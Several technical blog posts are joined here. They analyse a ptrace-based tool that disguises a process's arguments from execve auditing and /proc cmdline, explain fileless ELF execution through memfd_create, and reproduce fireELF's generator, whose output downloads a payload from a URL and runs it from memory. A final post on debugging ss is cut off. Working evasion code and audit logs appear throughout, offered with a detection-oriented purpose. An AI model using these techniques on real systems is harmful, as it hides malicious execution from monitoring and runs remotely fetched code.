
Obfuscating the Program Name and Arguments with ptrace and memfd_create

Overview

The article Fileless ELF Execution on Linux explained the memfd_create() principle used by the ptrace tool, but memfd_create() is not the whole story: the tool also uses the ptrace system call to modify the child process and thereby evade execve-based detection. This article is a more detailed, concrete analysis of the ptrace tool.

Besides using memfd_create() to create an anonymous file that lives only in memory, the ptrace tool then makes use of the ptrace system call.

Note: the tool is called ptrace, and ptrace is also the name of a system call. To keep them apart, this article says "the ptrace tool" for the former and "the ptrace system call" for the latter.

Source code

The core code of the ptrace tool lives in ptrace.c:

#include "ptrace.h"
#include "anonyexec.h"
#include "elfreader.h"
#include "common.h"
 
int main(int argc, char *argv[], char *envp[])
{
    pid_t  child = 0;
    long   addr  = 0, argaddr = 0;
    int    status = 0, i = 0, arc = 0;
    struct user_regs_struct regs;
    union
    {
        long val;
        char chars[sizeof(long)];
    } data;
    char *args[] = { "/bin/ls", "-a", "-l", NULL };
    uint64_t entry = elfentry(args[0]);    //_start: entry point
 
    child = fork();
    IFMSG(child == -1, 0, "fork");
    IF(child == 0, proc_child(args[0], args));
    MSG("child pid = %d\r\n", child);
    while(1)
    {
        wait(&status);
        if(WIFEXITED(status))
            break;
        // read the child's registers and save them into regs
        ptrace(PTRACE_GETREGS, child, NULL, &regs);
        if(regs.rip == entry)
        {
            MSG("EIP: _start %llx \r\n", regs.rip);
            MSG("RSP: %llx\r\n", regs.rsp);
            MSG("RSP + 8 => RDX(char **ubp_av) to __libc_start_main\r\n");
            //parse the stack data: int argc sits at the top of the stack
            addr = regs.rsp;
            arc = ptrace(PTRACE_PEEKTEXT, child, addr, NULL);
            MSG("argc: %d\r\n", arc);
            //after POP ESI the top of stack is char **ubp_av; note the pointer array itself also lives on the stack
            addr += 8;
            //start parsing and patching the arguments
            for(i = 1;i < arc;i ++)
            {
                //ptrace(PTRACE_PEEKDATA, pid, addr, data)
                //reads one word (a long) at addr from the traced child pid; PEEKTEXT/PEEKDATA return the value read
                argaddr = ptrace(PTRACE_PEEKTEXT, child, addr + (i * sizeof(void*)), NULL);
                data.val = ptrace(PTRACE_PEEKTEXT, child, argaddr, NULL);
                MSG("src: ubp_av[%d]: %s\r\n", i, data.chars);
                MSG("dst: upb_av[%d]: %s\r\n", i, args[i]);
                //overwrite the bytes the argument pointer targets; this demo does not support arguments longer than 7 characters
                strncpy(data.chars, args[i], sizeof(long) - 1);
                ptrace(PTRACE_POKETEXT, child, argaddr, data.val);
            }
            ptrace(PTRACE_CONT, child, NULL, NULL);
            ptrace(PTRACE_DETACH, child, NULL, NULL);
            break;
        }
        //a single ptrace(PTRACE_SINGLESTEP) call does the job: it tells the kernel to stop the child again after it executes one more instruction
        ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
    }
    return 0;
}
 
static char *encryptedarg = "3abb6677af34ac57c0ca5828fd94f9d886c"
"26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523"
"eed7511e5a9e4b8ccb3a4686";
 
int proc_child(const char *path, char *argv[])
{
    int i = 1;
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    for(i = 1;argv[i] != NULL;i ++)
        argv[i] = encryptedarg;
    anonyexec(path, argv);
    return 0;
}

Results

When I first tested on kernel 5.0, running it failed as follows:

./ptrace          
child pid = 7392
/proc/self/fd/3: cannot access '3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686': No such file or directory
/proc/self/fd/3: cannot access '3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686': No such file or directory

On kernel 4.18 and earlier, however, it runs successfully:

$ ./ptrace
child pid = 58894
EIP: _start 4042d4
RSP: 7ffe6a464980
RSP + 8 => RDX(char **ubp_av) to __libc_start_main
argc: 3
src: ubp_av[1]: 3abb6677
dst: upb_av[1]: -a
src: ubp_av[2]: 3abb6677
dst: upb_av[2]: -l
total 72
drwxrwxr-x.  4 spoock spoock   268 Aug 22 21:55 .
drwxr-xr-x. 10 spoock spoock   189 Aug 22 21:54 ..
drwxrwxr-x.  8 spoock spoock   163 Aug 22 21:54 .git
-rw-rw-r--.  1 spoock spoock   803 Aug 22 21:54 1.c
-rw-rw-r--.  1 spoock spoock   361 Aug 22 21:54 Makefile
-rw-rw-r--.  1 spoock spoock  2842 Aug 22 21:54 README
-rw-rw-r--.  1 spoock spoock   681 Aug 22 21:54 anonyexec.c
-rw-rw-r--.  1 spoock spoock   226 Aug 22 21:54 anonyexec.h
-rw-rw-r--.  1 spoock spoock  2488 Aug 22 21:55 anonyexec.o
-rw-rw-r--.  1 spoock spoock   527 Aug 22 21:54 common.h
-rw-rw-r--.  1 spoock spoock   230 Aug 22 21:54 elfreader.c
-rw-rw-r--.  1 spoock spoock   142 Aug 22 21:54 elfreader.h
-rw-rw-r--.  1 spoock spoock  1544 Aug 22 21:55 elfreader.o
drwxrwxr-x.  2 spoock spoock   174 Aug 22 21:54 libptrace
-rwxrwxr-x.  1 spoock spoock 13768 Aug 22 21:55 ptrace
-rw-rw-r--.  1 spoock spoock  2123 Aug 22 21:54 ptrace.c
-rw-rw-r--.  1 spoock spoock   328 Aug 22 21:54 ptrace.h
-rw-rw-r--.  1 spoock spoock  4568 Aug 22 21:55 ptrace.o

The listing from total 72 onward shows that ls -a -l was executed successfully.

Monitoring with auditd gives the following:

type=SYSCALL msg=audit(1566540263.416:2144): arch=c000003e syscall=59 success=yes exit=0 a0=7fff5c378750 a1=7fff5c3788d0 a2=0 a3=7fff5c3781a0 items=2 ppid=58893 pid=58894 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=1 comm="3" exe=2F6D656D66643A656C66202864656C6574656429 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key="procmon"
type=EXECVE msg=audit(1566540263.416:2144): argc=3 a0="/proc/self/fd/3" a1="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686" a2="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686"
type=CWD msg=audit(1566540263.416:2144):  cwd="/home/centos/Desktop/ptrace"
type=PATH msg=audit(1566540263.416:2144): item=0 name="/proc/self/fd/3" inode=264888 dev=00:04 mode=0100777 ouid=1000 ogid=1000 rdev=00:00 obj=unconfined_u:object_r:user_tmp_t:s0 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PATH msg=audit(1566540263.416:2144): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=1415463 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PROCTITLE msg=audit(1566540263.416:2144): proctitle=2F70726F632F73656C662F66642F330033616262363637376166333461633537633063613538323866643934663964383836633236636535396138636536306563663637373830373934323364636366663164366631396362363535383035643536303938653664333861316137313064656535393532336565643735313165

The result captured through execve is:

a0="/proc/self/fd/3" a1="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686" a2="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686"

The ls -a -l command was not captured.

Looking directly at the process information under /proc gives:

{
    "pid": "58894",
    "ppid": "58893",
    "uid": "1000",
    "cmdline": "/proc/self/fd/3 3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686 3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686 ",
    "exe": "/memfd:elf (deleted)",
    "cwd": "/home/centos/Desktop/ptrace"
}

The cmdline matches what audit recorded, but exe (/memfd:elf (deleted)) gives away that the executable was created by memfd_create().

So although the program really executes ls -a -l, all that monitoring captures is /proc/self/fd/3 3abb6677... 3abb6677...; the executed program name and arguments are completely hidden and effectively undetectable. This is exactly what the ptrace tool advertises: obfuscating the executed program name and arguments with low privileges on Linux, evading command logs based on execve syscall monitoring.

How it works

The ptrace tool first defines the actual command it wants to run:

char *args[] = { "/bin/ls", "-a", "-l", NULL };

The whole tool revolves around executing /bin/ls -a -l without that command being detected.

Creating the child with fork

child = fork();
IFMSG(child == -1, 0, "fork");
IF(child == 0, proc_child(args[0], args));
MSG("child pid = %d\r\n", child);

fork() creates a child process; on success, the child executes proc_child(args[0], args).

static char *encryptedarg = "3abb6677af34ac57c0ca5828fd94f9d886c"
"26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523"
"eed7511e5a9e4b8ccb3a4686";
 
int proc_child(const char *path, char *argv[])
{
    int i = 1;
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    for(i = 1;argv[i] != NULL;i ++)
        argv[i] = encryptedarg;
    anonyexec(path, argv);
    return 0;
}

Look at the for loop first. When the child actually enters proc_child():

  • path: /bin/ls
  • argv[]: char *args[] = { "/bin/ls", "-a", "-l", NULL };

After the for loop, path and argv have become:

  • path: /bin/ls
  • argv[]: char *args[] = { "/bin/ls", "3abb6677af34ac5...", "3abb6677af34ac5...", NULL };

Now anonyexec(path, argv); is called. Following the analysis in Fileless ELF Execution on Linux, what ultimately executes is /proc/self/fd/3 3abb6677... 3abb6677..., where /proc/self/fd/3 is /bin/ls. So at this point we have really only executed ls, not /bin/ls -a -l.

The parent traces the child

proc_child() contains the call ptrace(PTRACE_TRACEME, 0, NULL, NULL);. To borrow the explanation from the article 玩转ptrace (一):

The typical ptrace workflow goes like this: the parent fork()s a child, and the child will exec() the program we want to trace. Before calling exec(), the child first calls ptrace with PTRACE_TRACEME, telling the kernel that the current process is being traced. When the child then calls execve(), it stops and control passes to its parent (via SIGCHLD). The parent, after fork(), calls wait() for the child to stop; once wait() returns, the parent can read the child's registers or manipulate the child in other ways.

That is what the wait(&status); in the parent's while(1) loop is for: handling these child stops.

Modifying the child

Confirming that ls is running

uint64_t entry = elfentry(args[0]);    //_start: entry point
....
ptrace(PTRACE_GETREGS, child, NULL, &regs);
if(regs.rip == entry)
{
    .....
  • uint64_t entry = elfentry(args[0]); args[0] is /bin/ls, so entry is the ELF entry point (_start) of /bin/ls
  • ptrace(PTRACE_GETREGS, child, NULL, &regs); reads the child's registers into regs, a struct user_regs_struct
  • if(regs.rip == entry) checks whether the child has just reached the entry point of /bin/ls; if so, we enter the patching logic below

Reading the argument count

//parse the stack data: int argc sits at the top of the stack
addr = regs.rsp;
arc = ptrace(PTRACE_PEEKTEXT, child, addr, NULL);

ptrace(PTRACE_PEEKTEXT, child, addr, NULL) reads one word (a long, not a single byte) from the traced child's memory at addr; on Linux, PTRACE_PEEKDATA behaves identically. Since addr here is regs.rsp, the call fetches the value at the top of the stack, which is the argument count argc.

Patching the argument values

for(i = 1;i < arc;i ++)
{
    //ptrace(PTRACE_PEEKDATA, pid, addr, data)
    //reads one word (a long) at addr from the traced child pid; PEEKTEXT/PEEKDATA return the value read
    argaddr = ptrace(PTRACE_PEEKTEXT, child, addr + (i * sizeof(void*)), NULL);
    data.val = ptrace(PTRACE_PEEKTEXT, child, argaddr, NULL);
    MSG("src: ubp_av[%d]: %s\r\n", i, data.chars);
    MSG("dst: upb_av[%d]: %s\r\n", i, args[i]);
    //overwrite the bytes the argument pointer targets; this demo does not support arguments longer than 7 characters
    strncpy(data.chars, args[i], sizeof(long) - 1);
    ptrace(PTRACE_POKETEXT, child, argaddr, data.val);
}

The first argument, args[0], is /bin/ls and needs no modification. As shown in the "Creating the child with fork" section above, argv[1] and argv[2] are both 3abb6677... .

  1. ptrace(PTRACE_PEEKTEXT) reads the word the argument pointer targets, i.e. the bytes of 3abb6677...
  2. strncpy(data.chars, args[i], sizeof(long) - 1); patches that buffer with the real argument
  3. ptrace(PTRACE_POKETEXT, child, argaddr, data.val); writes the word back into the child's memory

These three steps rewrite the argument strings in the child's memory, turning 3abb6677... into -a and -l respectively.
Finally, ptrace(PTRACE_CONT, ...) and ptrace(PTRACE_DETACH, ...) end the whole ptrace operation.
So the parent uses the ptrace system call to patch the argument values on the child's stack, while the executed binary, started through memfd_create(), shows up as /proc/self/fd/3. That is why neither execve monitoring nor /proc/<pid>/cmdline reveals the command actually executed.

Summary

Working through the ptrace tool was quite interesting. The analysis also tells us that a process's cmdline is not reliable, and the command obtained via execve is not necessarily the command actually executed. If neither execve nor cmdline can be fully trusted, how can we detect this behavior? A syscall hook on ptrace would certainly catch argument rewriting done through ptrace, but is a syscall hook the only answer?

References

Fileless ELF Execution on Linux

Overview

There are already plenty of articles online about fileless ELF execution on Linux, for example In-Memory-Only ELF Execution (Without tmpfs) and ELF in-memory execution, their Chinese counterparts Linux无文件渗透执行ELF and Linux系统内存执行ELF的多种方式, and tools such as fireELF (see the introduction fireELF:无文件Linux恶意代码框架). The key to all of these fileless techniques is the memfd_create() system call.

MEMFD_CREATE

The man page MEMFD_CREATE(2) describes it as follows:
int memfd_create(const char *name, unsigned int flags);

memfd_create() creates an anonymous file and returns a file descriptor that refers to it. The file behaves like a regular file,and so can be modified, truncated, memory-mapped, and so on.However, unlike a regular file, it lives in RAM and has a volatile backing storage. Once all references to the file are dropped, it is automatically released. Anonymous memory is used for all backing pages of the file. Therefore, files created by memfd_create() have the same semantics as other anonymous memory allocations such as those allocated using mmap with the MAP_ANONYMOUS flag.

The initial size of the file is set to 0. Following the call, the file size should be set using ftruncate(2). (Alternatively, the file may be populated by calls to write(2) or similar.)

The name supplied in name is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.

To summarize the key points:
memfd_create() creates an anonymous file and returns a descriptor for it. The file behaves like a regular file (modifiable, truncatable, mappable) but lives in RAM, and it is released automatically once the last reference to it is dropped; its backing pages have the same semantics as MAP_ANONYMOUS mmap memory.
The file's initial size is 0; it is grown afterwards with ftruncate() or write().
The name passed to memfd_create() appears as the target of the corresponding /proc/self/fd/ symlink, prefixed with memfd:. It exists only for debugging, has no effect on how the descriptor behaves, and multiple files may share the same name.

With memfd_create() introduced, let's look at some concrete examples.

ptrace

ptrace is an open-source tool released by 奇安信 (Qi An Xin), described as: obfuscate the executed program name and arguments with low privileges on Linux, evading command logs based on execve syscall monitoring. Its sample code is:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/memfd.h>
#include <sys/syscall.h>
#include <errno.h>
 
int anonyexec(const char *path, char *argv[])
{
    int   fd, fdm, filesize;
    void *elfbuf;
    char  cmdline[256];
 
    fd = open(path, O_RDONLY);
    filesize = lseek(fd, SEEK_SET, SEEK_END);
    lseek(fd, SEEK_SET, SEEK_SET);
    elfbuf = malloc(filesize);
    read(fd, elfbuf, filesize);
    close(fd);
    fdm = syscall(__NR_memfd_create, "elf", MFD_CLOEXEC);
    ftruncate(fdm, filesize);
    write(fdm, elfbuf, filesize);
    free(elfbuf);
    sprintf(cmdline, "/proc/self/fd/%d", fdm);
    argv[0] = cmdline;
    execve(argv[0], argv, NULL);
    return -1;
}
 
int main()
{
    char *argv[] = {"/bin/uname", "-a", NULL};
    int result =anonyexec("/bin/uname", argv);
    return result;
}

Let's analyze this code.

lseek

The prototype of lseek is:

#include <unistd.h>
 
off_t lseek(int fd,off_t offset,int whence); /*Returns new file offset if successful, or -1 on error*/

whence is one of SEEK_SET, SEEK_CUR, or SEEK_END, and offset is interpreted differently for each; see LSEEK(2) for details.

In this example, filesize = lseek(fd, SEEK_SET, SEEK_END); is equivalent to filesize = lseek(fd, 0, SEEK_END); (SEEK_SET is defined as 0), which returns the size of the whole file.

fd = open(path, O_RDONLY);
filesize = lseek(fd, SEEK_SET, SEEK_END);
lseek(fd, SEEK_SET, SEEK_SET);
elfbuf = malloc(filesize);
read(fd, elfbuf, filesize);

So this code opens the file at path, obtains its size via lseek, and reads the file's contents into elfbuf with read().

memfd_create

Given the earlier discussion of memfd_create, calling memfd_create("elf", MFD_CLOEXEC); directly should yield the fd of an anonymous file, and it is completely equivalent to the syscall(__NR_memfd_create, "elf", MFD_CLOEXEC); used in the code above.

I was puzzled about why the raw syscall was used, until I read In-Memory-Only ELF Execution: that article works in Perl, which has no binding for memfd_create(), so it has to go through syscall(), and for that it needs memfd_create()'s syscall number.

$ uname -a
Linux 5.0.0-25-generic #26~18.04.1-Ubuntu SMP Thu Aug 1 13:51:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' *
asm-generic/unistd.h:#define __NR_memfd_create 279
asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create)
linux/memfd.h:#define MFD_CLOEXEC       0x0001U
valgrind/vki/vki-scnums-x86-linux.h:#define __NR_memfd_create       356
valgrind/vki/vki-scnums-ppc64-linux.h:#define __NR_memfd_create 360
valgrind/vki/vki-scnums-arm-linux.h:#define __NR_memfd_create               385
valgrind/vki/vki-scnums-mips64-linux.h:#define __NR_memfd_create           (__NR_Linux + 314)
valgrind/vki/vki-scnums-s390x-linux.h:#define __NR_memfd_create 350
valgrind/vki/vki-scnums-arm64-linux.h:#define __NR_memfd_create 279
valgrind/vki/vki-scnums-ppc32-linux.h:#define __NR_memfd_create 360
valgrind/vki/vki-scnums-mips32-linux.h:#define __NR_memfd_create        (__NR_Linux + 354)
valgrind/vki/vki-scnums-amd64-linux.h:#define __NR_memfd_create       319
x86_64-linux-gnu/bits/mman-shared.h:# ifndef MFD_CLOEXEC
x86_64-linux-gnu/bits/mman-shared.h:#  define MFD_CLOEXEC 1U
x86_64-linux-gnu/bits/syscall.h:#ifdef __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:# define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356
x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319)
x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319

So the syscall number of memfd_create on x86-64 is 319, and MFD_CLOEXEC is 1U. The following three calls are therefore equivalent:

  • memfd_create("elf", MFD_CLOEXEC)
  • syscall(__NR_memfd_create, "elf", MFD_CLOEXEC);
  • syscall(319,"elf",1);

One more note on MFD_CLOEXEC: it means close-on-exec. In a complex system, by the time we fork a child we may have lost track of how many file descriptors (sockets included) are open, and cleaning them up one by one is genuinely hard. What we want is to say, when opening a descriptor before the fork: "close this one when the child exec()s." That is exactly what close-on-exec provides.

execve

The key lines for execution are:

sprintf(cmdline, "/proc/self/fd/%d", fdm);
argv[0] = cmdline;
execve(argv[0], argv, NULL);

sprintf() writes /proc/self/fd/<fdm> into cmdline, so argv[0] now refers to the process's own anonymous file descriptor, whose content is the file passed in as path.
In this example, execve(argv[0], argv, NULL) is therefore equivalent to running /bin/uname -a.
Monitoring with auditd, we get:

type=EXECVE msg=audit(1566354435.549:153): argc=2 a0="/proc/self/fd/4" a1="-a"
type=CWD msg=audit(1566354435.549:153): cwd="/home/spoock/Desktop/test"
type=PATH msg=audit(1566354435.549:153): item=0 name="/proc/self/fd/4" inode=1550663 dev=00:05 mode=0100777 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0
type=PATH msg=audit(1566354435.549:153): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=11014834 dev=08:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0
type=PROCTITLE msg=audit(1566354435.549:153): proctitle="./a.out"

The captured execve record is type=EXECVE msg=audit(1566354435.549:153): argc=2 a0="/proc/self/fd/4" a1="-a". uname never appears; only /proc/self/fd/4 does, which evades command monitoring based on execve.

Monitoring /proc yields {"pid":"8360","ppid":"22571","uid":"1000","cmdline":"/proc/self/fd/4 -a ","exe":"/memfd:elf (deleted)","cwd":"/home/spoock/Desktop/test"}, consistent with what auditd recorded.

As for the name passed to memfd_create(), it shows up in exe as /memfd:elf (deleted): the memfd: prefix followed by the file name.

ELF in-memory execution

Now look at the sample program from ELF in-memory execution, which differs from the ptrace tool's:

#include <stdio.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
 
int main() {
    int fd;
    pid_t child;
    char buf[BUFSIZ] = "";
    ssize_t br;
 
    fd = syscall(SYS_memfd_create, "foofile", 0);
    if (fd == -1) {
        perror("memfd_create");
        exit(EXIT_FAILURE);
    }
 
    child = fork();
    if (child == 0) {
        dup2(fd, 1);
        close(fd);
        execlp("/bin/date", "", NULL);
        perror("execlp date");
        exit(EXIT_FAILURE);
    } else if (child == -1) {
        perror("fork");
        exit(EXIT_FAILURE);
    }
 
    waitpid(child, NULL, 0);
 
    lseek(fd, 0, SEEK_SET);
    br = read(fd, buf, BUFSIZ);
    if (br == -1) {
        perror("read");
        exit(EXIT_FAILURE);
    }
    buf[br] = 0;
 
    printf("pid:%d\n", getpid());
    printf("child said: '%s'\n", buf);
    pause();
    exit(EXIT_SUCCESS);
}

Unlike the ptrace tool, this code relies on fork() and an inherited descriptor. The initial fd = syscall(SYS_memfd_create, "foofile", 0); means the same as in ptrace, so it needs no further explanation.

fork

child = fork();
if (child == 0) {
    dup2(fd, 1);
    close(fd);
    execlp("/bin/date", "/bin/date", NULL);
    perror("execlp date");
    exit(EXIT_FAILURE);
} else if (child == -1) {
    perror("fork");
    exit(EXIT_FAILURE);
}

  1. child = fork() creates a child process;
  2. child == 0 tells us we are in the child, which then proceeds with the steps below;
  3. dup2(fd, 1); close(fd); points the child's file descriptor 1 (stdout) at fd;
  4. execlp("/bin/date", "/bin/date", NULL); execlp(), like execve(), replaces the process image; here it runs /bin/date.

Because the child's stdout now points at fd, whatever /bin/date prints ends up written into fd.

read

One thing to be clear about with fork(): the child receives copies of all of the parent's file descriptors, created in the same way as by dup(). That means the corresponding descriptors in parent and child refer to the same open file description, so after the child writes to fd, the parent sees those changes too.

Now the following code:

lseek(fd, 0, SEEK_SET);
br = read(fd, buf, BUFSIZ);
if (br == -1) {
     perror("read");
     exit(EXIT_FAILURE);
}
buf[br] = 0;
  1. lseek(fd, 0, SEEK_SET); rewinds fd to the beginning of the file
  2. br = read(fd, buf, BUFSIZ); reads up to BUFSIZ bytes from fd into buf and returns the byte count br
  3. buf[br] = 0; NUL-terminates the buffer

Finally, printf("child said: '%s'\n", buf); prints the content of fd, which is the output of /bin/date.
Let's again observe the execution through audit and /proc.
The audit records are:

type=SYSCALL msg=audit(1566374961.124:5777): arch=c000003e syscall=59 success=yes exit=0 a0=55d8b6c9ac1a a1=7ffdd40de700 a2=7ffdd40e08a8 a3=0 items=2 ppid=22918 pid=22919 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts1 ses=2 comm="date" exe="/bin/date" key="rule01_exec_command"
type=EXECVE msg=audit(1566374961.124:5777): argc=1 a0=""
type=CWD msg=audit(1566374961.124:5777): cwd="/home/spoock/Desktop/test"
type=PATH msg=audit(1566374961.124:5777): item=0 name="/bin/date" inode=8912931 dev=08:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0
type=PATH msg=audit(1566374961.124:5777): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=11014834 dev=08:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0
type=PROCTITLE msg=audit(1566374961.124:5777): proctitle="(null)"

And the information under /proc:

$ ls -al /proc/22918/fd
total 0
dr-x------ 2 spoock spoock  0 Aug 21 17:58 .
dr-xr-xr-x 9 spoock spoock  0 Aug 21 17:52 ..
lrwx------ 1 spoock spoock 64 Aug 21 17:58 0 -> /dev/pts/1
lrwx------ 1 spoock spoock 64 Aug 21 17:58 1 -> /dev/pts/1
lrwx------ 1 spoock spoock 64 Aug 21 17:58 2 -> /dev/pts/1
lrwx------ 1 spoock spoock 64 Aug 21 17:58 3 -> '/memfd:foofile (deleted)'
 
$ ls -al /proc/22918/exe
lrwxrwxrwx 1 spoock spoock 0 Aug 21 17:52 /proc/22918/exe -> /home/spoock/Desktop/test/a.out

The telltale sign is quite clear, and it is the same one the ptrace tool leaves: file descriptor 3 points at a name beginning with memfd:, followed by the name of the anonymous file created by memfd_create().

fireELF

fireELF is another open-source fileless penetration-testing tool, introduced as follows:

fireELF is a opensource fileless linux malware framework thats crossplatform and allows users to easily create and manage payloads. By default is comes with 'memfd_create' which is a new way to run linux elf executables completely from memory, without having the binary touch the harddrive.

So it, too, uses memfd_create() to create an anonymous in-memory file for fileless execution. Its core code is simple.py:

import base64
 
desc = {"name" : "memfd_create", "description" : "Payload using memfd_create", "archs" : "all", "python_vers" : ">2.5"}
 
def main(is_url, url_or_payload):
    payload = '''import ctypes, os, urllib2, base64
libc = ctypes.CDLL(None)
argv = ctypes.pointer((ctypes.c_char_p * 0)(*[]))
syscall = libc.syscall
fexecve = libc.fexecve'''
    if is_url:
        payload += '\ncontent = urllib2.urlopen("{}").read()'.format(url_or_payload)
    else:
        encoded_payload = base64.b64encode(url_or_payload).decode()
        payload += '\ncontent = base64.b64decode("{}")'.format(encoded_payload)
    payload += '''\nfd = syscall(319, "", 1)
os.write(fd, content)
fexecve(fd, argv, argv)'''
    return payload

The essential part is:

libc = ctypes.CDLL(None)
argv = ctypes.pointer((ctypes.c_char_p * 0)(*[]))
syscall = libc.syscall
fd = syscall(319, "", 1)
fexecve = libc.fexecve
os.write(fd, content)
fexecve(fd, argv, argv)

In essence it again calls memfd_create() (syscall 319) to create an anonymous file, injects the payload with os.write(fd, content), and finally executes it with fexecve(fd, argv, argv). Fundamentally it is the same approach as the previous two.

Summary

Fileless ELF execution boils down to using memfd_create() to create an anonymous file that lives in memory, which does make detection somewhat harder. Even so, ELF executed via memfd_create() still leaves identifiable traces.

References

Linux无文件渗透执行ELF
Linux系统内存执行ELF的多种方式

Debugging and Analyzing the ss Source Code

Source-level debugging

ss lives in the iproute2 package; the source can be downloaded from iproute2, and setting it up for source-level debugging works the same way as in the netstat source debugging article.

Create a CMakeLists.txt in the project root with the following content:

cmake_minimum_required(VERSION 3.13)
project(test C)
 
set(BUILD_DIR .)
 
#add_executable()
add_custom_target(ss command -c ${BUILD_DIR})

Also change CCOPTS = -O2 on line 45 of the Makefile to CCOPTS = -O0 -g3.

Then configure the target in CLion:

clion-settings.png

Netid  State      Recv-Q Send-Q Local Address:Port             Peer Address:Port
tcp    ESTAB      0      0      127.0.0.1:57354                127.0.0.1:socks               
tcp    ESTAB      0      0      127.0.0.1:37350                127.0.0.1:socks               
tcp    ESTAB      0      0      172.16.40.154:43450                45.8.223.61:17250               
tcp    CLOSE-WAIT 1      0      127.0.0.1:57398                127.0.0.1:socks               
tcp    ESTAB      0      0      127.0.0.1:57062                127.0.0.1:socks

This is the same output as running the ss command directly. Next, let's analyze the execution flow of the ss program.

main

The main function parses the various options and uses them to decide which functions to execute.

int main(int argc, char *argv[])
{
    int saw_states = 0;
    int saw_query = 0;
    int do_summary = 0;
    const char *dump_tcpdiag = NULL;
    FILE *filter_fp = NULL;
    int ch;
    int state_filter = 0;
    int addrp_width, screen_width = 80;
 
    while ((ch = getopt_long(argc, argv,
                 "dhaletuwxnro460spbEf:miA:D:F:vVzZN:KHS",
                 long_opts, NULL)) != EOF) {
        switch (ch) {
        case 'n':
            resolve_services = 0;
            break;
        ......
        }
        .....
    }

In the default case, execution reaches the following code:

if (do_default) {
    state_filter = state_filter ? state_filter : SS_CONN;
    filter_default_dbs(&current_filter);
}

The program calls filter_default_dbs() to set the default filter conditions.

filter_default_dbs

static void filter_default_dbs(struct filter *f) {
    filter_db_set(f, UDP_DB);
    filter_db_set(f, DCCP_DB);
    filter_db_set(f, TCP_DB);
    filter_db_set(f, RAW_DB);
    filter_db_set(f, UNIX_ST_DB);
    filter_db_set(f, UNIX_DG_DB);
    filter_db_set(f, UNIX_SQ_DB);
    filter_db_set(f, PACKET_R_DB);
    filter_db_set(f, PACKET_DG_DB);
    filter_db_set(f, NETLINK_DB);
    filter_db_set(f, SCTP_DB);
}

filter_default_dbs() is simple: it enables the default set of socket tables (UDP, TCP, unix, packet, netlink, SCTP, ...) as the filter.

After that, execution reaches unix_show(&current_filter);.

unix_show

The function code is:

static int unix_show(struct filter *f)
{
    FILE *fp;
    char buf[256];
    char name[128];
    int  newformat = 0;
    int  cnt;
    struct sockstat *list = NULL;
    const int unix_state_map[] = { SS_CLOSE, SS_SYN_SENT,
                       SS_ESTABLISHED, SS_CLOSING };
 
    if (!filter_af_get(f, AF_UNIX))
        return 0;
 
    if (!getenv("PROC_NET_UNIX") && !getenv("PROC_ROOT")
        && unix_show_netlink(f) == 0)
        return 0;
 
